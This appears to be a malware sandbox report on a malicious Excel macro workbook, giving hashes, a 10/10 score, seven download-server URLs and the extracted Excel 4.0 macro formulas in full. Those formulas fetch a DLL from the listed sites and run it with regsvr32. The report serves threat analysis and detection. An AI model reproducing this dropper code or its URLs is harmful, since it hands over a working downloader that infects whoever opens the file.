Overview

overview

10

Static

static

10

c48ee23160...a.xlsm

windows7-x64

10

c48ee23160...a.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c48ee231603f2af5a87f084b786a81c8595abffd5d2c7919ef1b6e17be03b1fa

  • Size

    30KB

  • Sample

    241120-zl5m1aserg

  • MD5

    2878fb7b128e0869cee3a2ab35190144

  • SHA1

    b46a9b499e67dbfdfde7bbb58e2b2fc0ab8cdc39

  • SHA256

    c48ee231603f2af5a87f084b786a81c8595abffd5d2c7919ef1b6e17be03b1fa

  • SHA512

    40c14b7cae023763c4c47775d2342bae1b734865e0eb262072cf6531518cb45ab3da167f6758ddbc8f66fe9d57ee936832b6e997747f538da42380d94278e60b

  • SSDEEP

    384:L842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:8HFhNZliH2ydFfPdkqstJhE6v

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/

http://blog.centerking.top/wp-includes/DBq5jx/

http://polarrefrigeracao.com.br/fontes/y7QpO/

http://filmsetserie.dx.am/img/ghCY9J5KD1J/

https://vagbharati.in/wp-admin/nYBb/

http://advogadogoiania.com.br/wp-includes/O9Az4/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/6cc4ts0bkrOlXq/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/DBq5jx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://polarrefrigeracao.com.br/fontes/y7QpO/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://filmsetserie.dx.am/img/ghCY9J5KD1J/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vagbharati.in/wp-admin/nYBb/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/O9Az4/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

Targets

    • Target

      c48ee231603f2af5a87f084b786a81c8595abffd5d2c7919ef1b6e17be03b1fa

    • Size

      30KB

    • MD5

      2878fb7b128e0869cee3a2ab35190144

    • SHA1

      b46a9b499e67dbfdfde7bbb58e2b2fc0ab8cdc39

    • SHA256

      c48ee231603f2af5a87f084b786a81c8595abffd5d2c7919ef1b6e17be03b1fa

    • SHA512

      40c14b7cae023763c4c47775d2342bae1b734865e0eb262072cf6531518cb45ab3da167f6758ddbc8f66fe9d57ee936832b6e997747f538da42380d94278e60b

    • SSDEEP

      384:L842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:8HFhNZliH2ydFfPdkqstJhE6v

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks